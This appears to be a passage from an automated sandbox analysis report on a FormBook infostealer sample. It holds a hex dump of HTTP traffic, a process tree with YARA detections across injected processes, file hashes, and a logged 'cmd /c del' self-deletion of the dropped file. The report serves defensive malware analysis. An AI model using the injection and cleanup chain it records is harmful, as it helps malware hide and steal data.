                                                                    2021-10-27 14:29:02 UTC35INData Raw: 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 62 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 69 2e 69 3b 76 61 72 20 63 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 74 72 79 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 6f 6d 22 29 3b 61 26 26 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 2e 63
                                                                    Data Ascii: er.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var b=window.gbar.i.i;var c=window.gbar;var f=function(d){try{var a=document.getElementById("gbom");a&&d.appendChild(a.c
                                                                    2021-10-27 14:29:02 UTC36INData Raw: 3b 63 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 63 2b 22 2f 73 65 61 72 63 68 5c 5c 3f 22 29 3b 28 62 3d 63 2e 74 65 73 74 28 62 29 29 26 26 21 2f 28 5e 7c 5c 5c 3f 7c 26 29 65 69 3d 2f 2e 74 65 73 74 28 61 2e 68 72 65 66 29 26 26 28 62 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 26 26 62 2e 6b 45 58 50 49 26 26 28 61 2e 68 72 65 66 2b 3d 22 26 65 69 3d 22 2b 62 2e 6b 45 49 29 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6d 28 61 29 3b 0a 6e 28 61 29 7d 2c 71 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 73 6e 29 7b 76 61 72 20 61 3d 2f 2e 2a 68 70 24 2f 3b 72 65 74 75 72 6e 20 61 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 73 6e 29 3f 22 22 3a
                                                                    Data Ascii: ;c=new RegExp("^"+c+"/search\\?");(b=c.test(b))&&!/(^|\\?|&)ei=/.test(a.href)&&(b=window.google)&&b.kEXPI&&(a.href+="&ei="+b.kEI)},p=function(a){m(a);n(a)},q=function(){if(window.google&&window.google.sn){var a=/.*hp$/;return a.test(window.google.sn)?"":
                                                                    2021-10-27 14:29:02 UTC38INData Raw: 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 22 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 6c 34 6f 70 51 4c 6a 77 6c 53 42 57 4e 63 4b 73 68 47 48 6d 51 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 72 63 3d 27 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 27 3b 76 61 72 20 69 65 73 67 3d 66 61 6c 73 65 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6e 20 26 26 20 77 69 6e 64 6f 77 2e 6e 28 29 3b 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 69 6d 61 67 65 73 29 7b 6e 65 77 20 49 6d 61 67 65 28 29 2e 73 72 63 3d 73 72 63 3b 7d 0a 69 66 20 28 21 69 65 73 67 29 7b
                                                                    Data Ascii: )();</script></head><body bgcolor="#fff"><script nonce="ql4opQLjwlSBWNcKshGHmQ==">(function(){var src='/images/nav_logo229.png';var iesg=false;document.body.onload = function(){window.n && window.n();if (document.images){new Image().src=src;}if (!iesg){
                                                                    2021-10-27 14:29:02 UTC39INData Raw: 64 3d 67 62 5f 34 32 36 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 77 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 74 61 62 3d 77 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 4e 65 77 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 32 33 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6d 61 69 6c 2f 3f 74 61 62 3d 77 6d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 47 6d 61 69 6c 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c
                                                                    Data Ascii: d=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><
                                                                    2021-10-27 14:29:02 UTC40INData Raw: 6b 2f 73 68 6f 70 70 69 6e 67 3f 68 6c 3d 65 6e 26 73 6f 75 72 63 65 3d 6f 67 26 74 61 62 3d 77 66 22 3e 53 68 6f 70 70 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 33 30 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 3f 74 61 62 3d 77 6a 22 3e 42 6c 6f 67 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 32 37 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 66 69 6e 61 6e 63 65 3f 74 61 62 3d 77 65 22 3e 46 69 6e 61 6e 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61
                                                                    Data Ascii: k/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><a class=gbmt id=gb_30 href="https://www.blogger.com/?tab=wj">Blogger</a></li><li class=gbmtc><a class=gbmt id=gb_27 href="https://www.google.co.uk/finance?tab=we">Finance</a></li><li cla
                                                                    2021-10-27 14:29:02 UTC41INData Raw: 61 73 73 3d 67 62 74 73 3e 3c 73 70 61 6e 20 69 64 3d 67 62 69 34 73 31 3e 53 69 67 6e 20 69 6e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 74 20 67 62 74 62 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 67 74 20 69 64 3d 67 62 67 35 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 65 6e 22 20 74 69 74 6c 65 3d 22 4f 70 74 69 6f 6e 73 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 74 72 75 65 20 61 72 69 61 2d 6f 77 6e 73 3d 67 62 64 35 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74
                                                                    Data Ascii: ass=gbts><span id=gbi4s1>Sign in</span></span></a></li><li class="gbt gbtb"><span class=gbts></span></li><li class=gbt><a class=gbgt id=gbg5 href="http://www.google.co.uk/preferences?hl=en" title="Options" aria-haspopup=true aria-owns=gbd5><span class=gbt
                                                                    2021-10-27 14:29:02 UTC43INData Raw: 3d 22 32 35 25 22 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 6e 6f 77 72 61 70 3d 22 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 69 65 22 20 76 61 6c 75 65 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 76 61 6c 75 65 3d 22 65 6e 2d 47 42 22 20 6e 61 6d 65 3d 22 68 6c 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 73 6f 75 72 63 65 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 68 70 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 62 69 77 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 62 69 68 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 64 69
                                                                    Data Ascii: ="25%">&nbsp;</td><td align="center" nowrap=""><input name="ie" value="ISO-8859-1" type="hidden"><input value="en-GB" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><di
                                                                    2021-10-27 14:29:02 UTC44INData Raw: 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 6c 34 6f 70 51 4c 6a 77 6c 53 42 57 4e 63 4b 73 68 47 48 6d 51 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 61 2c 62 3d 22 31 22 3b 69 66 28 64 6f 63 75 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 29 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 29 62 3d 22 32 22 3b 65 6c 73 65 20 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 29 7b 76 61 72 20 63 2c 64 2c 65 3d 5b 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 2e 36 2e 30 22 2c 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 2e 33 2e 30 22 2c 22 4d 53 58 4d 4c 32 2e 58 4d 4c
                                                                    Data Ascii: ><script nonce="ql4opQLjwlSBWNcKshGHmQ==">(function(){var a,b="1";if(document&&document.getElementById)if("undefined"!=typeof XMLHttpRequest)b="2";else if("undefined"!=typeof ActiveXObject){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XML
                                                                    2021-10-27 14:29:02 UTC45INData Raw: 28 29 7b 0a 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2c 62 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3b 69 66 28 21 61 7c 7c 21 62 29 7b 76 61 72 20 63 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 64 3d 22 43 53 53 31 43 6f 6d 70 61 74 22 3d 3d 63 2e 63 6f 6d 70 61 74 4d 6f 64 65 3f 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3a 63 2e 62 6f 64 79 3b 61 3d 64 2e 63 6c 69 65 6e 74 57 69 64 74 68 3b 62 3d 64 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7d 61 26 26 62 26 26 28 61 21 3d 67 6f 6f 67 6c 65 2e 63 64 6f 2e 77 69 64 74 68 7c 7c 62 21 3d 67 6f 6f 67 6c 65 2e 63 64 6f 2e 68 65 69 67 68 74 29 26 26 67 6f 6f 67 6c 65 2e 6c 6f 67 28 22 22 2c 22 22 2c 22 2f 63 6c 69 65 6e 74 5f 32 30 34 3f 26 61 74 79 70
                                                                    Data Ascii: (){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d="CSS1Compat"==c.compatMode?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}a&&b&&(a!=google.cdo.width||b!=google.cdo.height)&&google.log("","","/client_204?&atyp
                                                                    2021-10-27 14:29:02 UTC47INData Raw: 2e 73 72 63 3d 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 6c 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 6c 3f 61 2e 67 3a 22 74 79 70 65 5f 65 72 72 6f 72 3a 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 22 3b 76 61 72 20 64 3b 61 3d 28 63 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 26 26 63 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 7c 7c 77 69 6e 64 6f 77 29 2e 64 6f 63 75 6d 65 6e 74 3b 28 64 3d 28 62 3d 6e 75 6c 6c 3d 3d 3d 28 64 3d 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 61 2c 22 73 63 72 69 70 74 5b 6e 6f 6e 63 65 5d 22 29 29 3f 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63
                                                                    Data Ascii: .src=a instanceof l&&a.constructor===l?a.g:"type_error:TrustedResourceUrl";var d;a=(c.ownerDocument&&c.ownerDocument.defaultView||window).document;(d=(b=null===(d=a.querySelector)||void 0===d?void 0:d.call(a,"script[nonce]"))?b.nonce||b.getAttribute("nonc
                                                                    2021-10-27 14:29:02 UTC48INData Raw: 5c 5c 78 32 32 2f 68 69 73 74 6f 72 79 5c 5c 5c 78 32 32 5c 5c 75 30 30 33 45 57 65 62 20 48 69 73 74 6f 72 79 5c 5c 75 30 30 33 43 2f 61 5c 5c 75 30 30 33 45 5c 78 32 32 2c 5c 78 32 32 70 73 72 6c 5c 78 32 32 3a 5c 78 32 32 52 65 6d 6f 76 65 5c 78 32 32 2c 5c 78 32 32 73 62 69 74 5c 78 32 32 3a 5c 78 32 32 53 65 61 72 63 68 20 62 79 20 69 6d 61 67 65 5c 78 32 32 2c 5c 78 32 32 73 72 63 68 5c 78 32 32 3a 5c 78 32 32 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 5c 78 32 32 7d 2c 5c 78 32 32 6f 76 72 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 70 71 5c 78 32 32 3a 5c 78 32 32 5c 78 32 32 2c 5c 78 32 32 72 65 66 70 64 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 72 66 73 5c 78 32 32 3a 5b 5d 2c 5c 78 32 32 73 62 61 73 5c 78 32 32 3a 5c 78 32 32 30 20 33 70 78 20 38 70 78 20
                                                                    Data Ascii: \\x22/history\\\x22\\u003EWeb History\\u003C/a\\u003E\x22,\x22psrl\x22:\x22Remove\x22,\x22sbit\x22:\x22Search by image\x22,\x22srch\x22:\x22Google Search\x22},\x22ovr\x22:{},\x22pq\x22:\x22\x22,\x22refpd\x22:true,\x22rfs\x22:[],\x22sbas\x22:\x220 3px 8px
                                                                    2021-10-27 14:29:02 UTC48INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Start time:16:28:59
                                                                    Start date:27/10/2021
                                                                    Path:C:\Users\user\Desktop\583475.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\583475.exe'
                                                                    Imagebase:0x840000
                                                                    File size:1085952 bytes
                                                                    MD5 hash:721356BFA1F8C23D40F6B2FF77B55DB0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:16:29:36
                                                                    Start date:27/10/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                    Imagebase:0x890000
                                                                    File size:42080 bytes
                                                                    MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 0%, Metadefender, Browse
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:16:29:41
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff6fee60000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    General

                                                                    Start time:16:30:18
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\SysWOW64\autofmt.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                    Imagebase:0x820000
                                                                    File size:831488 bytes
                                                                    MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:16:30:20
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmstp.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                    Imagebase:0x9d0000
                                                                    File size:82944 bytes
                                                                    MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:16:30:23
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                    Imagebase:0x11d0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:16:30:24
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >

                                                                      Executed Functions

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86994b42a7b7a629725b9d86ed5e7b87d5065c733d1d238892db84df41c798a5
                                                                      • Instruction ID: baa49315050f2a5964e71bae822dad6f2e64d6d46aed6027e0d7b74aa3a5bb85
                                                                      • Opcode Fuzzy Hash: 86994b42a7b7a629725b9d86ed5e7b87d5065c733d1d238892db84df41c798a5
                                                                      • Instruction Fuzzy Hash: 7E828E30A001198FDB54DFA8C894AAEBBF6AF89320F55856DE815EB352DB30DD41CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 27fcdad93637c1af846964fd9ad5f7223f84e01144af340256e0decd55649549
                                                                      • Instruction ID: cf7706ddbfeb6ea6d396025b3044da98bbc64a5dc13f96b658e2750b2111c5d8
                                                                      • Opcode Fuzzy Hash: 27fcdad93637c1af846964fd9ad5f7223f84e01144af340256e0decd55649549
                                                                      • Instruction Fuzzy Hash: 4E329E30B04209DFEB54DBA8C485BAEB7B6AB85334F11C52DE40AAB391DB34DD41DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
